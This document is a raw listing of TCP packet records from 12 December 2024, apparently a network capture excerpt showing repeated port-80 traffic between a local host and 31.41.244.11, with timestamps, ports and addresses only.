Dec 12, 2024 16:48:39.228737116 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.228789091 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.228926897 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.228971004 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.229923964 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.229967117 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.230559111 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.230619907 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.230968952 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.230983019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.231013060 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.231029987 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.231969118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.232019901 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.232193947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.232240915 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.328984022 CET	80	49943	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:39.378194094 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.378237009 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.378353119 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.378546000 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.378626108 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.378681898 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.379618883 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.379899979 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.379947901 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.380711079 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.380758047 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.381056070 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.381771088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.381818056 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.381896019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.382823944 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.382875919 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.383249044 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.383296013 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.383898973 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.384217024 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.384269953 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.384957075 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.385528088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.385576963 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.386022091 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.386059999 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.386249065 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.387124062 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.387175083 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.387475967 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.387648106 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.388187885 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.388263941 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.388309002 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.389215946 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.389453888 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.389502048 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.390341997 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.390387058 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.390440941 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.391396999 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.391443968 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.391635895 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.392585039 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.392606020 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.392631054 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.392641068 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.393503904 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.393727064 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.393771887 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.394610882 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.394747019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.394795895 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.395694971 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.395948887 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.395998955 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.396756887 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.396800041 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.397725105 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.397806883 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.397819042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.397857904 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.398859024 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.399044991 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.399091959 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.400043011 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.400341034 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.400384903 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.401048899 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.401115894 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.401171923 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.402136087 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.402185917 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.402250051 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.403228998 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.403295994 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.403450012 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.403492928 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.404208899 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.404573917 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.404628992 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.405335903 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.405428886 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.405476093 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.406373024 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.406423092 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.406475067 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.407433033 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.407480955 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.407720089 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.408516884 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.408565998 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.408651114 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.408695936 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.409650087 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.409769058 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.409818888 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.410656929 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.410761118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.410808086 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.411710978 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.412004948 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.412046909 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.412827969 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.412874937 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.413134098 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.413918972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.413978100 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.414143085 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.414932966 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.414983034 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.415112019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.415158033 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.416088104 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.416471004 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.416517973 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.417423964 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.417694092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.417762041 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.418268919 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.418309927 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.418564081 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.419404984 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.419450045 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.419536114 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.419636965 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.420315027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.420428038 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.420466900 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.421341896 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.421394110 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.421550989 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.421705961 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.422522068 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.422591925 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.422708035 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.422998905 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.423530102 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.423661947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.423691988 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.423703909 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.424546003 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.424607038 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.424696922 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.424868107 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.425664902 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.425725937 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.426759005 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.426778078 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.426867962 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.426929951 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.427077055 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.427867889 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.427880049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.427931070 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.428829908 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.429091930 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.429157019 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.429872036 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.429915905 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.430192947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.430982113 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.431056976 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.431803942 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.431998968 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.432037115 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.432221889 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.432224989 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.432333946 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.433099031 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.433177948 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.434036016 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.434103012 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.434130907 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.434173107 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.570641041 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.570668936 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.570724010 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.571027994 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.571090937 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.571280956 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.571361065 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.572092056 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.572179079 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.572333097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.572380066 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.573225975 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.573303938 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.573519945 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.573570013 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.574258089 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.574310064 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.574328899 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.574393034 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.575325012 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.575383902 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.575423956 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.575661898 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.576360941 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.576414108 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.576695919 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.576745033 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.577476025 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.577583075 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.577836990 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.577974081 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.578522921 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.578579903 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.578744888 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.579091072 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.579641104 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.579732895 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.579885960 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.580024004 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.580677986 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.580733061 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.581398010 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.581449986 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.581707001 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.581754923 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.581866026 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.581981897 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.582884073 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.582942963 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.583092928 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.583142996 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.583910942 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.583957911 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.584078074 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.584126949 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.584986925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.585030079 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.585216045 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.585259914 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.585988045 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.586047888 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.587085009 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.587109089 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.587130070 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.587157011 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.587160110 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.587244987 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.588164091 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.588219881 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.588432074 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.588478088 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.589299917 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.589361906 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.589514971 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.589567900 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.590277910 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.590327024 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.590563059 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.590662956 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.591375113 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.591428041 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.591515064 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.591599941 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.592412949 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.592466116 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.593450069 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.593511105 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.593544006 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.593555927 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.593595982 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.593616009 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.594594955 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.594644070 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.594801903 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.594846010 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.595729113 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.595777035 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.596035004 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.596081972 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.596708059 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.596752882 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.596818924 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.596863031 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.597796917 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.597865105 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.598063946 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.598189116 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.598848104 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.598897934 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.598928928 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.598970890 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.599941969 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.599992990 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.600115061 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.600156069 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.601041079 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.601090908 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.601248980 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.601293087 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.602103949 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.602155924 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.602251053 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.602339983 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.603128910 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.603226900 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.603347063 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.603431940 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.604207993 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.604266882 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.604325056 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.604406118 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.605249882 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.605308056 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.605448008 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.605499029 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.606327057 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.606374025 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.606426001 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.606623888 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.607419014 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.607481956 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.607794046 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.607846022 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.608520985 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.608592987 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.608726978 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.608777046 CET	49931	80	192.168.2.10	31.41.244.11
